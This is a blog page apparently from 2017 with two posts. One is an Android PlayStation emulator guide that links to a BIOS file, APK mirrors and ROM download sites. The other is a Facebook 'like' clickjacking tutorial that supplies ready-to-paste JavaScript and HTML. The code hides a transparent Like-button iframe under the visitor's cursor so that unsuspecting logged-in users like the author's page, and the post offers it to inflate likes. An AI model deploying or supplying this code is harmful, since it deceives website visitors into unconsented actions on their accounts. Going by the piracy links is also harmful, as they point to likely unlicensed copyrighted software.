Showing posts with label tutorial. Show all posts
Showing posts with label tutorial. Show all posts
Friday, February 24, 2017
ePSXe v1 9 5 Tutorial How to Play Play Station Games on Android Emulator Roms Bios
ePSXe v1 9 5 Tutorial How to Play Play Station Games on Android Emulator Roms Bios

ePSXe for Android is a PlayStation emulator (PSX and PSOne). It is a port from the famous ePSXe for PC. ePSXe provides very high compatibility and good speed. It is designed for smartphones and tablets, (for 1-4 players) including a fun 2 players option for tablets using split screen mode. Include virtual touchscreen pad support, and hardware buttons mapping (Xperia Play, phones with keyboard or gamepad, and external game pads - Bluetooth or USB - such.as WiiMote, Sixaxis, Xbox 360, Moga, Ipega...), and analog sticks. ePSXe for Android support OpenGL HD enhanced graphics thanks to Peopsxgl Plugin, see the documentation for configuration info (Menu->Info).ePSXe includes native support for ARM and Intel Atom X86.
Games must be provided by user.
Requires Android : 2.2+
Play Link : ePSXe
Download Links :
Apk
Zippyshare - ePSXe v1 9.5 Apk
Bios
Apkloft - SCPH1001.bin
Top Downloaded Psx Games(Rom File)
1.Tekken 3
2.Jackie Chan Stuntmaster
3.CTR - Crash Team Racing
4.Crash Bandicoot
5.Digimon World
6.WWF SmackDown! 2 - Know Your Role
7.Final Fantasy VII (Disc 1)
8.Bloody Roar II
9.Vigilante 8 - 2nd Offense
10.Final Fantasy VIII (Disc 1)
11.Digimon World
12.Pepsiman
13. Tenchu 2 - Birth of the Stealth Assassins
14.Yu-Gi-Oh! Forbidden Memories
15.FIFA Soccer
For More Games :
Coolrom
Emuparadise
Instructions :
1.Install Apk
2.Copy Bios and Rom file on youe Sdcard and watch the video tutorial..
Video :
Video :
Screenshots :




Available link for download
Friday, January 27, 2017
Facebook Likes Click Jacking Tutorial Script
Facebook Likes Click Jacking Tutorial Script
facebook likes clickjacking click jacking script tutorial facebook clickjacking script click jacking how to increase facebook likes hack free trick facebook likes jacking free tutorial hacking
![]() |
| facebook likes click jacking |
Today i am going to share a trick from which you can increase your face book fan page likes like hell fire. our todays topic is on how you can increase your Facebook likes by click jacking the users.
what is click jacking ?
According to OWASP
Click jacking, also known as a "UI redress attack", is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both.
But in simple words click jacking is like guiding the blind peoples in wrong direction for your wealth.
Because in click jacking mostly peoples try to hijack facebook likes and what they do is first they make the like button of facebook transparent in such a way that it is available but because of its transparency peoples cant see it and after they use java script to move this like button over your mouse, mean where ever your mouse will move this button will move with your cursor on the web page.
And they use this complete script in their web pages and all those visitors which come to that page read the article and if they are logged in from their facebook account and if they click on the webpage the like will be made automatically to your page after they click.
Get Started
I am going to give you ready made facebook likes click jacking script and you can use it only for testing.
- Put the below script code above </head> in your html/php page
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
</script>
<script type="text/javascript">
function ClickJackFbHide(){
jQuery("div[id^=clickjack-button-wrapper]").hide();
}
function ClickJackFbShow(){
jQuery("div[id^=clickjack-button-wrapper]").show();
}
</script>
- Now below is the main code so put it before </body> in html/php
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity=0); margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden">
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Replace Your facebook fan pageurl&layout=button_count&show_faces=false&
width=50&action=like&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>
</div>
<script type="text/javascript">
jQuery( document ).ready( function() {
$( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
jQuery( "#clickjack-button-wrapper-5" ).css( {
top: e.pageY - 10,
left: e.pageX + 30
} );
} );
clickjack_hider();
var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
} );
function clickjack_hider(){
jQuery("input").mouseout(function(){ClickJackFbShow();});
jQuery("a").mouseout(function(){ClickJackFbShow();});
jQuery("button").mouseout(function(){ClickJackFbShow();});
jQuery("textarea").mouseout(function(){ClickJackFbShow();});
jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();}); jQuery("object").mouseout(function(){ClickJackFbShow();});
jQuery("input").mouseover(function(){ClickJackFbHide();});
jQuery("a").mouseover(function(){ClickJackFbHide();});
jQuery("button").mouseover(function(){ClickJackFbHide();});
jQuery("textarea").mouseover(function(){ClickJackFbHide();});
jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();}); jQuery("object").mouseover(function(){ClickJackFbHide();});
}
</script>
Now check the script i am 100% sure this is working because i have tested it right now so first unlike your page and then check the script you will get the finger on the page which is a sign that script is working and like button is moving with your cursor in hidden mode.
Keep visiting and also if you face any problem regarding this article dont hesitate to do comment below i will answer your question as soon as possible.
Available link for download
Subscribe to:
Posts (Atom)
